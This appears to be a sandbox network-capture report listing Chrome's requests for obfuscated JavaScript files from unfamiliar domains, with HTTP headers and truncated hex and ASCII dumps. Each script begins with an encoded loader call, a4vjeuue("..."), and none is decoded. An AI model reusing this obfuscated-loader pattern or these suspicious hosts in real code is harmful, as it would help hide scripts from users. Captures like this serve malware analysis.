                                                                                                                                                          2024-06-09 22:41:14 UTC824INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 6a 4c 67 4e 67 41 34 42 64 41 47 67 47 38 41 69 41 56 67 45 73 55 41 31 4b 67 4c 67 44 4d 42 58 4e 47 41 46 77 62 55 77 38 79 61 4d 69 41 43 55 31 44 6b 68 41 41 43 4a 44 77 42 4f 64 58 6c 51 44 63 41 65 54 41 41 72 45 4c 77 42 30 41 45 78 42 73 36 61 45 41 41 55 46 4b 43 43 41 55 38 41 6e 70 68 46 55 41 2b 69 35 42 49 41 73 69 67 4d 63 41 4e 69 42 55 6c 41 42 75 55 48 34 63 49 43 77 41 68 41 41 4d 41 4c 35 69 71 71 45 4b 4d 6e 51 41 76 43 43 59 56 44 45 77 45 47 78 55 59 6d 51 6f 61 52 51 47 55 44 78 51 37 46 79 38 2f 4a 67 53 43 69 41 38 48 41 70 6f 46 44 44 57 39 67 42 4b 64 41 44 6d 41 42 59 38 4c 46 52 42 4d 41 5a 6f 35 75 56 39 4c 48 53
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjLgNgA4BdAGgG8AiAVgEsUA1KgLgDMBXNGAFwbUw8yaMiACU1DkhAACJDwBOdXlQDcAeTAArELwB0AExBs6aEAAUFKCCAU8AnphFUA+i5BIAsigMcANiBUlABuUH4cICwAhAAMAL5iqqEKMnQAvCCYVDEwEGxUYmQoaRQGUDxQ7Fy8/JgSCiA8HApoFDDW9gBKdADmABY8LFRBMAZo5uV9LHS


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          444192.168.2.55021623.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:14 UTC554OUTGET /pc/240516-03/static/js/components/382/menu.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://xpj723.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:14 UTC626INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:14 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 2172
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:58:38 GMT
                                                                                                                                                          ETag: "6645cabe-87c"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE1[4],EU-GER-frankfurt-EDGE4-CACHE1[0,TCP_HIT,3],EU-FRA-paris-GLOBAL1-CACHE9[3],EU-FRA-paris-GLOBAL1-CACHE9[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2473794
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: feb423cf518b6c1380a8dea7fa38f171
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 118206
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:14 UTC2172INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 6e 41 5a 67 43 59 42 64 41 47 67 47 38 42 35 41 63 51 43 45 42 5a 41 4c 67 44 4d 42 58 4e 47 41 46 77 45 74 31 4d 31 53 6e 41 4a 54 6b 41 76 71 55 72 63 49 41 4a 78 62 73 75 76 4e 50 30 47 6b 51 49 67 45 53 73 6b 49 41 41 52 4a 4f 30 37 6c 33 55 42 75 53 6d 41 42 57 49 4c 67 44 6f 41 4a 69 47 62 63 30 49 41 41 72 53 55 45 45 4e 4d 34 42 50 54 4a 79 6b 36 67 44 36 77 53 42 49 39 43 68 32 72 41 41 32 49 4f 6f 55 41 47 35 51 4d 61 77 67 6a 41 43 45 41 41 79 69 51 69 62 4a 30 6a 70 51 41 4c 77 67 6d 4f 70 5a 4d 42 44 4d 36 6b 4b 6b 33 4d 58 6b 4d 43 67 41 74 68 44 6f 49 47 69 63 53 49 7a 6b 4c 5a 32 73 41 4d 71 73 59 48 49 63 50 48 77 69 30 69 43
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAnAZgCYBdAGgG8B5AcQCEBZALgDMBXNGAFwEt1M1SnAJTkAvqUrcIAJxbsuvNP0GkQIgESskIAARJO07l3UBuSmABWILgDoAJiGbc0IAArSUEENM4BPTJyk6gD6wSBI9Ch2rAA2IOoUAG5QMawgjACEAAyiQibJ0jpQALwgmOpZMBDM6kKk3MXkMCgAthDoIGicSIzkLZ2sAMqsYHIcPHwi0iC


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          445192.168.2.55021290.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:14 UTC556OUTGET /pc/240516-03/static/js/components/wrapper.js HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://wns732.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:14 UTC636INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:14 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 1860
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:59:00 GMT
                                                                                                                                                          ETag: "6645cad4-744"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE2[3],EU-GER-frankfurt-EDGE5-CACHE6[0,TCP_HIT,2],EU-GER-frankfurt-GLOBAL1-CACHE4[18],EU-GER-frankfurt-GLOBAL1-CACHE7[0,TCP_HIT,16],1.1 google
                                                                                                                                                          X-CCDN-Expires: 826095
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 3a35240aa8bce2e4e3ca0b2d0661b3df
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1765905
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:14 UTC1860INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 54 41 64 67 45 34 42 64 41 47 67 47 38 41 52 53 67 4a 51 45 55 41 75 41 4d 77 46 63 30 59 41 58 41 53 33 55 7a 56 4a 43 6b 4f 41 53 6e 49 41 69 46 6b 68 41 41 43 4a 42 77 42 4f 58 54 6d 49 44 63 41 65 54 41 41 72 45 4a 77 42 30 41 45 78 42 4d 75 61 45 41 41 56 35 4b 43 43 48 6b 63 41 6e 70 6b 46 69 41 2b 73 35 42 49 41 73 69 6e 30 73 41 4e 69 44 45 4b 41 44 63 6f 58 78 59 51 42 67 42 43 41 41 59 41 58 32 45 56 45 50 6c 70 4c 67 42 65 44 6b 77 78 53 6e 30 41 44 6d 41 78 59 56 4a 35 64 4e 30 30 54 43 35 43 6c 6e 54 4d 36 4a 67 49 4a 67 4c 53 58 32 71 78 41 44 6b 41 54 51 41 50 4e 55 61 55 56 4d 78 35 54 47 46 4d 63 6c 6a 53 44 57 31 4f 54 46 39
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtATAdgE4BdAGgG8ARSgJQEUAuAMwFc0YAXAS3UzVJCkOASnIAiFkhAACJBwBOXTmIDcAeTAArEJwB0AExBMuaEAAV5KCCHkcAnpkFiA+s5BIAsin0sANiDEKADcoXxYQBgBCAAYAX2EVEPlpLgBeDkwxSn0ADmAxYVJ5dN00TC5ClnTM6JgIJgLSX2qxADkATQAPNUaUVMx5TGFMcljSDW1OTF9


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          446192.168.2.55021390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:14 UTC555OUTGET /pc/240516-03/static/js/components/slides.js HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://wns732.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:14 UTC638INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:14 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 57212
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:58:57 GMT
                                                                                                                                                          ETag: "6645cad1-df7c"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE5[7],EU-GER-frankfurt-EDGE5-CACHE1[0,TCP_HIT,3],EU-GER-frankfurt-GLOBAL1-CACHE9[14],EU-GER-frankfurt-GLOBAL1-CACHE1[0,TCP_HIT,11],1.1 google
                                                                                                                                                          X-CCDN-Expires: 826095
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 1ae9edb7b283f0376d13f09a6e6926eb
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1765905
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:14 UTC15746INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 54 41 64 67 46 59 42 64 41 47 67 47 38 42 42 41 4d 79 51 45 59 41 75 61 67 56 7a 52 67 42 63 42 4c 64 54 64 30 7a 67 4a 54 6b 41 76 71 51 44 6d 41 52 7a 67 41 76 4a 71 77 37 63 30 76 66 71 53 52 43 41 62 6c 41 42 4f 41 41 68 43 6b 30 70 46 41 47 34 41 68 43 7a 5a 63 65 55 49 51 43 4a 6d 53 45 44 71 54 73 74 6e 44 72 65 4e 6f 41 76 4e 69 53 5a 62 41 41 5a 4f 41 41 55 41 43 31 73 42 4d 6e 55 55 54 67 41 54 48 55 44 76 5a 4d 77 55 62 31 73 4c 42 58 52 62 5a 50 59 41 54 77 67 51 46 47 70 4d 45 47 38 62 41 48 34 51 41 44 6f 6f 43 41 67 41 47 7a 7a 4d 54 67 4d 42 42 68 41 42 41 42 38 75 33 6d 71 51 41 41 38 49 46 43 31 32 4a 47 38 55 41 57 46 4d 54
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtATAdgFYBdAGgG8BBAMyQEYAuagVzRgBcBLdTd0zgJTkAvqQDmARzgAvJqw7c0vfqSRCAblABOAAhCk0pFAG4AhCzZceUIQCJmSEDqTstnDreNoAvNiSZbAAZOAAUAC1sBMnUUTgATHUDvZMwUb1sLBXRbZPYATwgQFGpMEG8bAH4QADooCAgAGzzMTgMBBhABAB8u3mqQAA8IFC12JG8UAWFMT
                                                                                                                                                          2024-06-09 22:41:14 UTC16384INData Raw: 39 4e 2f 71 6f 62 48 4e 54 6d 51 7a 4d 53 69 49 4e 4d 62 65 72 63 4c 4d 57 6b 7a 6d 4d 79 46 6d 50 43 64 6c 6a 6b 4e 71 72 6d 5a 44 48 70 4a 7a 64 55 36 63 38 30 4c 6e 4e 74 43 37 64 72 73 34 32 53 43 31 58 4d 31 48 72 6a 47 35 75 63 79 36 64 34 61 5a 78 61 49 41 6a 5a 7a 4e 38 6d 45 5a 33 46 43 67 69 6d 53 72 78 49 33 63 68 65 58 63 76 6f 63 48 68 6e 61 37 49 64 50 30 79 64 52 61 4a 2b 6e 34 36 4b 46 6a 4f 70 77 56 75 53 5a 34 48 4e 72 66 71 38 33 67 4e 4d 4f 79 4c 46 30 34 41 7a 75 67 58 4c 35 6d 4c 38 4b 4f 47 45 49 58 47 31 2b 6b 6d 71 6f 71 78 39 56 67 6f 38 2b 57 67 66 36 52 6b 58 6f 79 4b 74 36 75 59 73 5a 69 6f 7a 35 44 41 45 70 46 57 4a 44 75 6e 31 35 34 6a 63 4d 2f 48 7a 30 53 4d 69 72 73 4f 66 57 45 44 6a 76 46 6a 39 6c 70 53 48 59 61 6c 50 6f
                                                                                                                                                          Data Ascii: 9N/qobHNTmQzMSiINMbercLMWkzmMyFmPCdljkNqrmZDHpJzdU6c80LnNtC7drs42SC1XM1HrjG5ucy6d4aZxaIAjZzN8mEZ3FCgimSrxI3cheXcvocHhna7IdP0ydRaJ+n46KFjOpwVuSZ4HNrfq83gNMOyLF04AzugXL5mL8KOGEIXG1+kmqoqx9Vgo8+Wgf6RkXoyKt6uYsZioz5DAEpFWJDun154jcM/Hz0SMirsOfWEDjvFj9lpSHYalPo
                                                                                                                                                          2024-06-09 22:41:15 UTC16384INData Raw: 38 67 77 71 58 63 48 5a 75 32 79 59 54 4e 44 78 64 4b 58 76 64 4b 78 64 43 51 6a 42 67 30 44 79 58 76 6b 57 4a 63 39 30 31 6c 36 42 69 32 58 36 67 48 6d 42 75 31 30 34 56 2b 44 45 6a 49 55 41 39 77 50 34 35 4d 46 2f 6a 7a 78 38 30 32 32 66 68 31 65 7a 57 51 73 54 5a 6f 67 4a 6e 4c 66 49 71 32 6d 37 5a 2b 58 53 71 6b 39 5a 4a 72 46 7a 66 61 52 63 6e 42 78 77 6b 4d 74 32 4b 6a 68 2b 69 78 58 71 41 79 53 67 63 55 4d 46 50 4b 30 6c 79 4b 53 42 31 42 64 45 48 71 4d 68 7a 38 63 38 76 53 66 44 75 34 71 67 41 55 6a 70 58 48 36 41 68 32 78 58 6e 57 44 59 35 4a 58 31 44 4f 6a 68 34 6e 59 49 4e 47 6a 37 48 68 7a 43 7a 56 44 63 2f 63 74 66 34 45 49 69 57 47 2b 37 35 58 78 38 47 66 41 73 31 63 76 52 55 67 65 58 47 77 73 41 33 44 74 77 59 4e 75 4b 74 4e 49 41 4f 30 30
                                                                                                                                                          Data Ascii: 8gwqXcHZu2yYTNDxdKXvdKxdCQjBg0DyXvkWJc901l6Bi2X6gHmBu104V+DEjIUA9wP45MF/jzx8022fh1ezWQsTZogJnLfIq2m7Z+XSqk9ZJrFzfaRcnBxwkMt2Kjh+ixXqAySgcUMFPK0lyKSB1BdEHqMhz8c8vSfDu4qgAUjpXH6Ah2xXnWDY5JX1DOjh4nYINGj7HhzCzVDc/ctf4EIiWG+75Xx8GfAs1cvRUgeXGwsA3DtwYNuKtNIAO00
                                                                                                                                                          2024-06-09 22:41:15 UTC8698INData Raw: 6e 38 70 63 73 76 61 6c 5a 45 75 4f 4a 39 64 31 43 70 2f 6b 4e 5a 35 34 6b 4c 4f 4a 52 48 51 47 6c 34 55 4b 47 6c 4e 6d 6d 31 6c 75 73 74 58 78 4e 36 4b 30 46 62 5a 4f 44 32 66 64 4e 76 6c 56 56 4a 30 2b 4e 73 6f 68 4a 51 6b 53 58 36 34 46 48 64 52 37 36 6c 58 41 4e 47 4c 71 35 6b 39 4d 55 5a 6a 74 4d 74 59 4c 74 4f 33 77 77 33 49 33 46 4c 30 75 35 4a 53 31 4d 6b 4a 32 34 6f 46 4a 70 34 76 31 70 69 44 4a 67 38 2f 30 76 6d 61 66 58 4b 6b 2b 61 75 4f 49 70 4b 43 6f 59 41 61 43 72 2f 5a 54 44 79 56 4a 33 34 6f 41 4a 4f 4d 6f 59 70 2b 4d 70 67 35 68 4d 71 41 5a 2b 43 75 74 49 31 41 72 69 6c 50 74 49 70 6c 73 62 54 62 6c 55 49 4d 2f 35 48 33 4d 55 67 38 45 72 6d 41 6d 31 77 34 56 66 33 4f 37 5a 6f 50 54 42 35 4d 38 41 4d 52 6b 31 32 63 61 67 58 4e 52 35 59 38
                                                                                                                                                          Data Ascii: n8pcsvalZEuOJ9d1Cp/kNZ54kLOJRHQGl4UKGlNmm1lustXxN6K0FbZOD2fdNvlVVJ0+NsohJQkSX64FHdR76lXANGLq5k9MUZjtMtYLtO3ww3I3FL0u5JS1MkJ24oFJp4v1piDJg8/0vmafXKk+auOIpKCoYAaCr/ZTDyVJ34oAJOMoYp+Mpg5hMqAZ+CutI1ArilPtIplsbTblUIM/5H3MUg8ErmAm1w4Vf3O7ZoPTB5M8AMRk12cagXNR5Y8


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          447192.168.2.55021590.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:14 UTC553OUTGET /pc/240516-03/static/js/components/news.js HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://wns732.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:14 UTC638INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:14 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 8744
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:58:54 GMT
                                                                                                                                                          ETag: "6645cace-2228"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE3[3],EU-GER-frankfurt-EDGE5-CACHE1[0,TCP_HIT,2],EU-GER-frankfurt-GLOBAL1-CACHE8[16],EU-GER-frankfurt-GLOBAL1-CACHE12[0,TCP_HIT,14],1.1 google
                                                                                                                                                          X-CCDN-Expires: 826095
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 191466ca3a2e3aa4352126ab8cd9b576
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1765905
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:14 UTC8744INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 54 41 44 67 45 34 42 64 41 47 67 47 38 41 68 45 41 46 77 42 6b 41 75 41 4d 77 46 63 30 59 61 42 4c 64 54 4a 55 6d 67 4a 54 6b 41 76 71 52 69 55 41 61 70 57 5a 73 4f 33 4e 4c 33 36 6b 30 51 67 45 51 73 6b 49 41 41 52 49 61 41 4a 30 34 64 56 41 62 67 44 79 59 41 46 59 67 4f 41 4f 67 41 6d 49 4a 70 7a 51 67 41 43 6e 70 51 51 51 65 6d 67 45 39 4d 4e 4b 53 71 41 50 72 42 49 45 67 41 73 69 68 32 4c 41 41 32 49 4b 6f 55 41 47 35 51 73 53 77 67 44 41 43 45 41 41 7a 43 41 73 59 70 65 6c 6f 67 41 4c 77 4b 71 67 43 32 53 51 41 53 41 49 71 71 41 71 53 63 5a 54 59 4b 49 49 30 6f 5a 5a 69 71 41 43 4a 32 2b 4d 41 4e 70 4d 41 74 43 69 69 4e 65 6c 32 71 32 5a
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtATADgE4BdAGgG8AhEAFwBkAuAMwFc0YaBLdTJUmgJTkAvqRiUAapWZsO3NL36k0QgEQskIAARIaAJ04dVAbgDyYAFYgOAOgAmIJpzQgACnpQQQemgE9MNKSqAPrBIEgAsih2LAA2IKoUAG5QsSwgDACEAAzCAsYpelogALwKqgC2SQASAIqqAqScZTYKII0oZZiqACJ2+MANpMAtCiiNel2q2Z


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          448192.168.2.55021723.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:14 UTC552OUTGET /pc/240516-03/static/js/components/inside.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://xpj723.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:14 UTC629INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:14 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 1380
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:58:51 GMT
                                                                                                                                                          ETag: "6645cacb-564"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE1[4],EU-GER-frankfurt-EDGE4-CACHE2[0,TCP_HIT,3],EU-FRA-paris-GLOBAL1-CACHE7[20],EU-FRA-paris-GLOBAL1-CACHE10[0,TCP_HIT,19],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2487290
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 23ffe7ae73acf18ad7e0cccc7d866e65
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 104710
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:14 UTC1380INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 54 41 54 67 45 59 42 64 41 47 67 47 38 41 6c 41 4d 57 6f 47 45 41 75 41 4d 77 46 63 30 59 41 58 41 53 33 55 78 46 4c 51 42 4b 63 67 46 39 53 41 63 30 49 41 50 4e 4d 7a 61 63 65 61 50 67 4e 49 64 68 41 49 68 5a 49 51 41 41 69 51 63 41 54 6c 30 37 71 41 33 41 48 6b 77 41 4b 78 43 63 41 64 41 42 4d 51 54 4c 6d 68 41 41 46 41 79 67 67 67 44 48 41 4a 36 59 61 4b 54 71 41 50 71 68 49 45 67 41 73 69 67 4f 4c 41 41 32 49 4f 6f 55 41 47 35 51 38 53 77 67 44 41 43 45 41 41 77 69 67 71 5a 70 42 6a 70 63 41 4c 77 63 6d 4f 71 35 4d 42 42 4d 36 6f 4b 6b 53 47 58 6b 61 46 41 41 74 6c 6e 71 72 6b 68 63 54 73 6b 51 58 68 42 49 44 4e 6a 71 33 4a 30 47 36 6d 51
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtATATgEYBdAGgG8AlAMWoGEAuAMwFc0YAXAS3UxFLQBKcgF9SAc0IAPNMzaceaPgNIdhAIhZIQAAiQcATl07qA3AHkwAKxCcAdABMQTLmhAAFAygggDHAJ6YaKTqAPqhIEgAsigOLAA2IOoUAG5Q8SwgDACEAAwigqZpBjpcALwcmOq5MBBM6oKkSGXkaFAAtlnqrkhcTskQXhBIDNjq3J0G6mQ


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          449192.168.2.550210183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:14 UTC624OUTGET /ftl/commonPage/zh_CN/mobileTopic/images/special_3.jpg HTTP/1.1
                                                                                                                                                          Host: 8vpfnx.eveday.me
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://e933002.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:15 UTC633INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 6871
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-HUZ-MP-02-14
                                                                                                                                                          ETag: "5d848f4f-1ad7"
                                                                                                                                                          Date: Mon, 27 May 2024 07:28:58 GMT
                                                                                                                                                          Last-Modified: Fri, 20 Sep 2019 08:35:27 GMT
                                                                                                                                                          Expires: Wed, 26 Jun 2024 07:28:58 GMT
                                                                                                                                                          Age: 1177936
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-204
                                                                                                                                                          x-link-via: dgct63:443;huzmp02:80;
